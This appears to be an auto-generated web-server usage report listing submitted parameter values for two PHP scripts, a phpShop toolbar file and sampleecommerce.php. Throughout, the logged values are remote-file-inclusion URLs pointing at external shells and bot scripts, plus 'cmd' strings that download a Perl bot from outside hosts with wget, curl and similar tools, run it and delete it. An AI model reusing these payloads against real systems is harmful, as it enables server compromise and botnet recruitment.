ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://btarte.free.fr/vtvbeta/administrator/components/com_e
xtcalendar/datos.txt?
1
http://216.222.194.67/~crew/bitch.txt?? 1
http://216.222.194.67/bitch.txt?? 1
http://itxdnetworks.com.br/inbox2.txt? 1
http://www.cfr.cl/mail/bot.txt??? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm ops.txt;wget http://pemlk.iespana.es/tools/hehehe
/ops.txt;fetch http://pemlk.iespana.es/tools/hehehe/ops.txt;
lwp-download http://pemlk.iespana.es/tools/hehehe/ops.txt;cu
rl -O http://pemlk.iespana.es/tools/hehehe/ops.txt;lynx http
://pemlk.iespana.es/tools/hehehe/ops.txt;perl ops.txt;rm ops
.txt?
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.dolphins-youth.de/pear/goinbox.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.eldemocrata.org/cache/hehe.txt? 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://infected1249.iespana.es/r57.txt? 1
http://orkutnova.100free.com/inbox.txt? 1
http://www.emroam.hpgvip.ig.com.br/cmd.gif? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://gikowns.googlepages.com/bn.txt? 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/crew-master/apc.txt 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://klzor.web21.f3.k8.com.br/testador.txt 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://spam.219.googlepages.com/pbot.txt? 1
http://h1.ripway.com/enviandodidi/vivo.jpg? 1
http://baixinho.we.bs/tool25.txt? 1
http://www.fileupyours.com/files/156611/sc2.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
10
OTHER: 960
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://gikowns.googlepages.com/bn.txt? 1
http://geocities.com/skido_chua/skido.php? 1
http://www.mateus.t5.com.br/pbotmTs.txt? 1
http://www.analisenet.com.br/controle/newspublish/id.txt? 1
http://www.franchinishop.com.br/fotos/faroffero.txt? 1
http://usuarios.arnet.com.ar/larry123/morgan.txt? 1
http://eusoufeliz69.xpg.com.br/lola.txt?http://eusoufeliz69.
xpg.com.br/lola.txt?
1
OTHER: 963
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://usuarios.arnet.com.ar/larry123/ka.txt? 9
OTHER: 961
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://18.247.4.232/spread.txt? 1
http://trampinho.iespana.es/57.? 1
http://71.41.190.203/scanin.txt 1
http://d1459929.u68.igempresas.ig.com.br/rave.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.spamaqueveminfo.com/toma.txt;curl -O
http://www.spamaqueveminfo.com/toma.txt;fetch http://www.sp
amaqueveminfo.com/toma.txt;lynx http://www.spamaqueveminfo.c
om/toma.txt;lwp-download http://www.spamaqueveminfo.com/toma
.txt;perl toma.txt
1
Parameter path[docroot]
ValueAccesses
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt? 4
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://joaobenner.fileave.com/script2.txt?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm botf.txt;wget http://71.41.190.203/botf.txt;fetch
http://71.41.190.203/botf.txt;lwp-download http://71.41.190
.203/botf.txt;curl -O http://71.41.190.203/botf.txt;lynx htt
p://71.41.190.203/botf.txt;perl botf.txt;rm -rf botf.txt*
2
Parameter path[docroot]
ValueAccesses
http://nodan.110mb.com/hehe.txt? 6
OTHER: 962
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://baixinho.we.bs/spread.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://gikowns.googlepages.com/BOTNET-GIKO.txt? 2
http://www.lordxpl.xpg.com.br/own.txt?? 2
http://210.246.145.70:32000/bitch.txt??? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://h1.ripway.com/renatas2/revengans.txt? 1
http://www.scotao.com/scot.txt? 1
http://210.246.145.70:32000/bitch.txt??? 1
http://pc2you.ro/classes/phpmailer/config/exp667.txt? 1
http://www.ilegais.110mb.com/ur.txt? 1
http://xsenharox.xpg.com.br/nois123?????????? 1
http://cytzfatal1ty.tripod.com/files/safe.txt? 1
http://eduzin96.googlepages.com/l1nm.txt 1
http://sanwall.coolpage.biz/test_inbox.txt? 1
OTHER: 961
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
3
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://br.geocities.com/zcrew99/bot.txt? 1
http://darkcode.h1x.com/c0de/php/phpshell2.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
3
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.docsite.ru/cache/injektion.txt? 1
http://www.revoltz.kit.net/cmd.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm bucetuda.txt;wget http://www.zjkjw.gov.cn/bucetud
a.txt;fetch http://www.zjkjw.gov.cn/bucetuda.txt;lwp-downloa
d http://www.zjkjw.gov.cn/bucetuda.txt;curl -O http://www.zj
kjw.gov.cn/bucetuda.txt;lynx http://www.zjkjw.gov.cn/bucetud
a.txt;perl bucetuda.txt;rm -rf *.txt
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.thebrn.kit.net/pbot.txt? 1
? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://chatbr.sytes.net:8090/apache2-default/staffpackts/apc
.txt
7
http://www.rj2008.kit.net/p.txt?? 7
http://vcsok.com/echo?http://usuarios.arnet.com.ar/larry123/
ka.txt?
3
? 2
OTHER: 951
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://fagner.crewhosting.com/own.txt?? 1
http://murilok.pop3.ru/bot.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://kt.digital-poison.net/spread.txt? 3
http://download-seguro.kit.net/cmd? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
www.snock.110mb.com/shellbot2.txt?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
=http://www.iff.coop/.../bre.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.ligseg.com.br/Etc/24.gif?http://www.ligseg.com.br
/Etc/24.gif?
1
http://snock.110mb.com/shellbot2.txt 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 4
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://electrobox106.com/ow33.txt?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://eduzin96.googlepages.com/l1nm.txt 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://vulnerable.we.bs/files/xroot-bnet.txt? 1
http://sbc.sytu.edu.cn/rodador.txt??? 1
http://bsthank.t35.com/spread.txt?? 1
http://64.8.110.2/xpl/ra.txt?? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.apocalypticduck.com/skins/advanced/config/tester.
txt?
2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://freewebs.com/diegoxfelix/ch.txt??? 1
http://c0debank.altervista.org/tool25.dat? 1
http://usuarios.arnetcom.ar/larry123/prot.txt? 1
http://www.xsenharox.xpg.com.br/pbot102030ig123.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.computelweb.com.br/modules/news/hehe.txt? 2
http://www.freewebs.com/scanspread/bot.txt? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://proxysx.t35.com/cmdimbox.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://yahwek.dll.googlepages.com/phpbot2.txt? 3
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.defacerz.org/b.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm teste.txt;wget http://www.zjkjw.gov.cn/teste.txt;
fetch http://www.zjkjw.gov.cn/teste.txt;lwp-download http://
www.zjkjw.gov.cn/teste.txt;curl -O http://www.zjkjw.gov.cn/t
este.txt;lynx http://www.zjkjw.gov.cn/teste.txt;perl teste.t
xt;rm -rf *.txt
1
Parameter path[docroot]
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 13
OTHER: 956
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://baixinho.we.bs/cmdimbox.txt? 1
http://raptortx.googlepages.com/ind.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://bsthank.t35.com/mundoirc.txt? 5
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.dolphins-youth.de/pear/inboxvox.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm -rf sta.txt*
1
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm -rf *.txt
1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebtown.com/vibeblog/ty.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 21
OTHER: 949
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://pesads159.t35.com/y.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://pemlk.iespana.es/tools/tool25.txt? 5
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.oifotosbrasil.com/root.txt 1
http://www.ilegais.xpg.com.br/bd?????? 1
http://usuarios.arnet.com.ar/larry123/http.txt? 1
http://www.ligseg.com.br/Etc/24.gif? 1
http://www.mateus.t5.com.br/tool25.txt? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm start.txt;wget http://189.24.48.179:8090/start.tx
t;fetch http://189.24.48.179:8090/start.txt;lwp-download htt
p://189.24.48.179:8090/start.txt;curl -O http://189.24.48.17
9:8090/start.txt;lynx http://189.24.48.179:8090/start.txt;pe
rl start.txt;rm start.txt
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://human-design.ru/adm/faqsupport/config/tester.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 25
http://www.ospenetrasitabira.com.br/files/tester.txt? 3
http://scanbx.iespana.es/bitch.txt?? 3
OTHER: 939
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/evilx? 1
http://vulnerable.we.bs/files/safe.txt? 1
http://sanwall.coolpage.biz/testGMAIL.txt? 1
http://om-autoteile.eu/http.txt?? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.omgtube.net/importer/hehe.txt? 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://claroline.lct-net.cl/id? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://priv8.crewhosting.com/php.txt?? 2
http://deprive61.fileave.com/gmail.png? 2
http://human-design.ru/adm/faqsupport/config/tester.txt? 1
http://yahwek.fileave.com/inbox.txt? 1
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebtown.com/c4sh1234/sc.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://smokan.fileave.com/bot3.txt? 1
http://ownedson.110mb.com/b.txt? 1
http://64.32.13.161/ma.txt 1
http://71.41.190.203/scanin.txt 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://botnet.y0.pl/...../albania_ch.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://216.222.194.67/bitch.txt??? 1
http://yahwek.dll.googlepages.com/phpbot.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://h1.ripway.com/capetacorpz/apx.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://mail.tu-varna.acad.bg/test.jpg?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://mail.tu-varna.acad.bg/test.jpg?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter
ValueAccesses
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.raptor.we.bs/bot.txt? 1
http://freewebs.com/larry123/bot.txt?? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;killall -9 perl;wget http://projectyenor2.iespana.es
/kkk.txt;curl -O http://projectyenor2.iespana.es/kkk.txt;fet
ch http://projectyenor2.iespana.es/kkk.txt;lynx http://proje
ctyenor2.iespana.es/kkk.txt;lwp-download http://projectyenor
2.iespana.es/kkk.txt;perl kkk.txt??
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.lolz.kit.net/brasvip/acao.jpg? 1
http://s33xy.ifrance.com/r7???? 1
http://216.83.134.89/testebot.txt? 1
http://usuarios.arnet.com.ar/larry123/http.txt?? 1
http://xsenhalol.xpg.com.br/subja? 1
http://www.freewebtown.com/scanr0x/ty.txt? 1
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch
http://malware.t35.com/tut.txt;lwp-download http://malware.
t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx
http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*
2
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch
http://malware.t35.com/tut.txt;lwp-download http://malware.
t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx
http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*h
ttp://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?
2
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://snock.110mb.com/teste.txt? 1
http://bsthank.t35.com/chuck.txt? 1
http://www.liceobrainstorm.cl/educacion//claroline/auth/exta
uth/drivers/config/tester.txt?
1
http://bocairent.net/phpmyadmin/README.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
10
OTHER: 960
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://69.93.214.234/~egacali/images/1.txt?http://69.93.214.
234/~egacali/images/1.txt?
1
http://n0gr0d.t35.com/php.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm bot.txt;wget http://www.zendurl.com/d/ddteam/bot.
txt;fetch http://www.zendurl.com/d/ddteam/bot.txt;curl -O ht
tp://www.zendurl.com/d/ddteam/bot.txt;lynx http://www.zendur
l.com/d/ddteam/bot.txt;perl bot.txt;rm -rf bot.txt;rm -rf bo
t.txt.1;rm -f bot.txt.2;rm -f bot.txt.3;rm -f bot.txt.4
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.ligseg.com.br/Etc/safe.gif? 1
http://yahwek.dll.googlepages.com/phpbot.txt? 1
http://enviabx.iespana.es/t.txt?? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf tut*;wget http://inimigo.t35.com/tut.txt;lwp-
download http://inimigo.t35.com/tut.txt;fetch http://inimigo
.t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut.
txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source
http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf
tut.txt*
3
1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.stdr.xpg.com.br/1? 1
http://www.ir4dex.kit.net/aln.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
8
Parameter path[docroot]
ValueAccesses
http://www.powerbikes.gr/forum/tool25.txt? 18
OTHER: 944
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://chat.wins.com.br/httd.txt?http://chat.wins.com.br:808
0/httd.txt
1
http://76.79.79.181/feia.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.catim.com/legislacao/suntik/r57? 8
OTHER: 962
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://bsthank.t35.com/mundoirc.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://human-design.ru/adm/faqsupport/config/exp667.txt? 7
http://usuarios.arnet.com.ar/larry123/safe.txt? 5
http://www.fuck-all.kit.net/pbot2.txt? 4
http://flaw.we.bs/a.txt? 4
OTHER: 950
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://xsenhalol.xpg.com.br/subaj????????? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.txd.conexaostore.com/tester? 4
http://ganhador.eushells.org/bot.txt?? 4
http://gutitaaa.100webspace.net/c.txt? 4
http://www.capsoir.com/images/TRA.txt? 4
http://www.stdr.xpg.com.br/1? 3
